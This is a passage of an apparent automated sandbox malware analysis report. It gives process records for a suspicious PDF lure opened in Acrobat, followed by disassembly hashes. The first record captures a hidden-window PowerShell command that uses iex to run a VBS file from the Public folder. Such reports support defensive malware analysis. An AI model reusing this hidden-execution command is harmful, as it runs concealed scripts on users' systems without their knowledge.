                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
                                                              Imagebase:0x7ff6e3d50000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:05:56:19
                                                              Start date:19/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                              Imagebase:0x7ff651090000
                                                              File size:5'641'176 bytes
                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:05:56:20
                                                              Start date:19/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                              Imagebase:0x7ff70df30000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:11
                                                              Start time:05:56:21
                                                              Start date:19/12/2024
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                              Imagebase:0x7ff7403e0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:13
                                                              Start time:05:56:21
                                                              Start date:19/12/2024
                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1760,i,5841402874270245853,5687332266173655936,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                              Imagebase:0x7ff70df30000
                                                              File size:3'581'912 bytes
                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Executed Functions

                                                                Function 00007FFD34079C6D Relevance: .5, Instructions: 518COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a9e08253567346b4c067f9f8539e72c0305dc86ddef7829dca75c76faf4e0bf9
                                                                • Instruction ID: 5ed6dd7555f6bafb62ba45ef5df4dadf117ee0ad80d798ad55c3d90449e69538
                                                                • Opcode Fuzzy Hash: a9e08253567346b4c067f9f8539e72c0305dc86ddef7829dca75c76faf4e0bf9
                                                                • Instruction Fuzzy Hash: 90F1F122B0EBC60FF79696285CB62B57FE1EF53210B0841BFD189C71E3D919AC05A752
                                                                Function 00007FFD3407613D Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56ffa0ac028a0a6d5360166e0c544f2986609085558739bee4d03fc5729cf485
                                                                • Instruction ID: 70c2f903c0a5d2ee309e7af2f66940741486f70c546d5f5604b497814d6ca53a
                                                                • Opcode Fuzzy Hash: 56ffa0ac028a0a6d5360166e0c544f2986609085558739bee4d03fc5729cf485
                                                                • Instruction Fuzzy Hash: 8B413732B0CA894FEB95DA5C98A55BCBBD1EF85360F1C45BFC14EC71A3DA18A801D341
                                                                Function 00007FFD34079DF4 Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77e6a84e0ecd18f51a07b4ca763e8b9a7b759aab5c556f2dfd17099de36720c1
                                                                • Instruction ID: f0b38973c2b3d52b302d09af5b1d5a01fef4f191f8415ad35abb991266b4d897
                                                                • Opcode Fuzzy Hash: 77e6a84e0ecd18f51a07b4ca763e8b9a7b759aab5c556f2dfd17099de36720c1
                                                                • Instruction Fuzzy Hash: 36213A22F0DA8A0FF3A596180CF52756AC2EF96354B4940BAD18CC71D3DD2DEC01BB42
                                                                Function 00007FFD3407159F Relevance: .1, Instructions: 77COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f87d8f7d24359f4f730f899cc19d539b66839be8e7060e4ef1fb80935be6bb7e
                                                                • Instruction ID: 830b8e909d895f5463500b978630b259bddc3e54e82ddc1e4d62036536db37cc
                                                                • Opcode Fuzzy Hash: f87d8f7d24359f4f730f899cc19d539b66839be8e7060e4ef1fb80935be6bb7e
                                                                • Instruction Fuzzy Hash: AC21FF62F0F6C65FE396A6285CB91642FE1AF5A614B0840FED089CB2D3DC1C9C099712
                                                                Function 00007FFD3407616A Relevance: .1, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aab7736e80fb4d9fc3c1ea57251bb0144c22db2d1a27f7a7cb1a78b84f0fcd4c
                                                                • Instruction ID: 57350c10b2db9bbad5d818606245d5e69ed7cf61eeec474c87a12f3339e2679d
                                                                • Opcode Fuzzy Hash: aab7736e80fb4d9fc3c1ea57251bb0144c22db2d1a27f7a7cb1a78b84f0fcd4c
                                                                • Instruction Fuzzy Hash: 9F110632F0D6854FEB55DA8848E41BC7BD1EF99360B1844BEC14ED71A3D928AC41D341
                                                                Function 00007FFD34070186 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62cd1c2bfb6a418777723e198f07d6d472eb468617f288b3eca26471f8eaf824
                                                                • Instruction ID: 0af3236131bf849175ca6423cc8e7605c87cfdaecd490daf892d096fa728a503
                                                                • Opcode Fuzzy Hash: 62cd1c2bfb6a418777723e198f07d6d472eb468617f288b3eca26471f8eaf824
                                                                • Instruction Fuzzy Hash: 3501D13130DC0A4FDF89DE0CD8A0E6037C1EBA9360F10427ED04AC7292D929EC85C780
                                                                Function 00007FFD33FA4995 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1a5841d374860f6dbd2673d4dbdf3f20467eeebf30f8f3ffd35b473f7368df3
                                                                • Instruction ID: 8770a82d5ba48aba8429755243d8db3c1544326e304ebefd7dc8db1659d73348
                                                                • Opcode Fuzzy Hash: f1a5841d374860f6dbd2673d4dbdf3f20467eeebf30f8f3ffd35b473f7368df3
                                                                • Instruction Fuzzy Hash: 7401A73021CB0C8FD744EF0CE051AA5B3E0FB89320F10052DE58AC3651D632E882CB42

                                                                Non-executed Functions

                                                                Function 00007FFD34070899 Relevance: 2.3, Strings: 1, Instructions: 1079COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 3A_L
                                                                • API String ID: 0-4039844740
                                                                • Opcode ID: 896048a299de900bc72c47662f08075dd5eee4094d1aeeb3c1fa2e35af212d48
                                                                • Instruction ID: 2804f252dbb30df84914dff5bad822c87e542afaed35601ee9fe3994b75523c0
                                                                • Opcode Fuzzy Hash: 896048a299de900bc72c47662f08075dd5eee4094d1aeeb3c1fa2e35af212d48
                                                                • Instruction Fuzzy Hash: 84521721B0DACA4FEB56DB2C88A4A613FD1EF57310B1981FAD149CB1D3D919EC46D382
                                                                Function 00007FFD33FA4CFA Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ^
                                                                • API String ID: 0-1590793086
                                                                • Opcode ID: 64ede05f6b8e7a2dc45ade3ea93abfbbc7b528217438a2f837ee67b548b45559
                                                                • Instruction ID: a8341ae724a39e56ee8f65546a22b30773ab219a92312410579f307919c27c55
                                                                • Opcode Fuzzy Hash: 64ede05f6b8e7a2dc45ade3ea93abfbbc7b528217438a2f837ee67b548b45559
                                                                • Instruction Fuzzy Hash: 5DA1D757E0EBD60FE753872C58710E53F60DF53220B4A03F7C6C8AB193EA19694A96A1
                                                                Function 00007FFD3407199D Relevance: .9, Instructions: 868COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b700039a3b715111501c1343ac5edbfa9297a7bf74dd2ed8530736e2e05df03
                                                                • Instruction ID: bc2e81473b20187b9c376cc1190886bc964504f651f7d58269a8e55c0f59de7f
                                                                • Opcode Fuzzy Hash: 0b700039a3b715111501c1343ac5edbfa9297a7bf74dd2ed8530736e2e05df03
                                                                • Instruction Fuzzy Hash: 86421932B0DB890FE795DA2C98A55B47FE1EF56210B0441BFD18DCB2D3DE29AC069742
                                                                Function 00007FFD34072F09 Relevance: .7, Instructions: 666COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454711995.00007FFD34070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34070000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34070000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56414f53734e05d062dfada1088ce1428469194ceb95e6ffa4cbc7bfe5abf109
                                                                • Instruction ID: ca58258c903a0127414e82c8a87d3978a52d7c82757a5394bfa01595523820f1
                                                                • Opcode Fuzzy Hash: 56414f53734e05d062dfada1088ce1428469194ceb95e6ffa4cbc7bfe5abf109
                                                                • Instruction Fuzzy Hash: DA12E532B0DBC94FE7A69B385CA56A57FE0EF57210B0941FBD148C7193D928AC05D392
                                                                Function 00007FFD33FA6852 Relevance: .4, Instructions: 404COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f93c009e5a80ec4ac29f79b60591ab3a8049ff4713ee794251dd3e1f95aaa51
                                                                • Instruction ID: 26429e656d305af0cf46e98e26b941cac8d398c7f4c1b41ae4a71788c373f10e
                                                                • Opcode Fuzzy Hash: 7f93c009e5a80ec4ac29f79b60591ab3a8049ff4713ee794251dd3e1f95aaa51
                                                                • Instruction Fuzzy Hash: 84B1285BB0D6D60FE792966C68F60E63BE4DF9333474903B3C68CDA093ED2858079651
                                                                Function 00007FFD33FA2BF8 Relevance: .4, Instructions: 376COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 984654cdf641f9b0bc16dc6cb0ebfed37e9ba511f120bc1a20917d984151f4c4
                                                                • Instruction ID: 80f0134c8615f271f86df7283c9d67ddb792d53aa1628bf1f472d57d24cec3ed
                                                                • Opcode Fuzzy Hash: 984654cdf641f9b0bc16dc6cb0ebfed37e9ba511f120bc1a20917d984151f4c4
                                                                • Instruction Fuzzy Hash: 4CC1D41BB0D7D21FE352976CA8B10D93FA0EF9336574901B7C2C8CA093E929951B97E1
                                                                Function 00007FFD33FA73D1 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38e914ef437c21adcbf40d26b5a14aa75eae53ecd662f690dbed09f0266bdb5c
                                                                • Instruction ID: 96927b87f685761ebea9ea11ba4e708984e923ca4642d81726ccae3c00c62286
                                                                • Opcode Fuzzy Hash: 38e914ef437c21adcbf40d26b5a14aa75eae53ecd662f690dbed09f0266bdb5c
                                                                • Instruction Fuzzy Hash: FE41B34BA0E7C29AE39342B81C758E67FB4DE9313574902F7D9C8CA093ED19084B9762
                                                                Function 00007FFD33FA8328 Relevance: 5.4, Strings: 4, Instructions: 414COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^$M_^$M_^$M_^
                                                                • API String ID: 0-1397233021
                                                                • Opcode ID: 16fa103c09e97091ad70e31841053e1717a29440e7c2571c0cfce314e7d1f0a3
                                                                • Instruction ID: 24e99c6b7a89e4dea2bd770a8c1f3fcb833c7d76458000e12d2b5e56090c1a75
                                                                • Opcode Fuzzy Hash: 16fa103c09e97091ad70e31841053e1717a29440e7c2571c0cfce314e7d1f0a3
                                                                • Instruction Fuzzy Hash: FDC1AD71A0CB894FE399EB1C84A55B57BE0FF96311B0402BED58EC7293E925BC028B41
                                                                Function 00007FFD33FA85E5 Relevance: 5.1, Strings: 4, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2454022669.00007FFD33FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd33fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M_^$M_^$M_^$M_^
                                                                • API String ID: 0-1397233021
                                                                • Opcode ID: a0606fb02da0a97ccfed784c8a4d573244062f9a8790daaab75e913327a33fe4
                                                                • Instruction ID: 3617e4f882c75c925fb94ead8c7636e2ff565e0580b2480bd2c006b125952137
                                                                • Opcode Fuzzy Hash: a0606fb02da0a97ccfed784c8a4d573244062f9a8790daaab75e913327a33fe4
                                                                • Instruction Fuzzy Hash: 52219253E0EAC65FE693522854BA0D93FE49F9732474E02F2C7C8DF193AD581C076611

                                                                Executed Functions

                                                                Function 00007FFD34082CFA Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270404954.00007FFD34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34080000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd34080000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e9297715c1477276dbc87a096ba93745b00c57908ac38a3b0df03f3b1f419c3
                                                                • Instruction ID: 4ca0ba9b0c4e7133dab7112447034b5498809cc1ccc49e211ee0cb6d26a413df
                                                                • Opcode Fuzzy Hash: 3e9297715c1477276dbc87a096ba93745b00c57908ac38a3b0df03f3b1f419c3
                                                                • Instruction Fuzzy Hash: D4311832B0CA894FEB95EB5C94A16B8BBD1EF5A220F1801BFC14DC71D3DA19A801D391
                                                                Function 00007FFD34082D1A Relevance: .1, Instructions: 58COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270404954.00007FFD34080000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34080000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd34080000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d4e19e49bf8f4a483bf5e43c4ad3f2443f71a154c1158087e628128492ac144
                                                                • Instruction ID: 0544b0cba5fed8658dbe79d553451588b4155ac0355c3a2860c41a7f4a98853c
                                                                • Opcode Fuzzy Hash: 8d4e19e49bf8f4a483bf5e43c4ad3f2443f71a154c1158087e628128492ac144
                                                                • Instruction Fuzzy Hash: D711C232B0D7894FEB95EA98C4E0578BBD1EF5A211B5400BEC64DD71D3DA29A841E340
                                                                Function 00007FFD33FB33B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.2270245063.00007FFD33FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_7ffd33fb0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction ID: 68f2ad056d85f5314422981b77dd5df7875fe41f5cb5e1dd419fd5a2c40ff67a
                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                • Instruction Fuzzy Hash: 2A01A77020CB0C4FD744EF0CE051AA6B3E0FB89320F50052EE58AC3651DA32E882CB41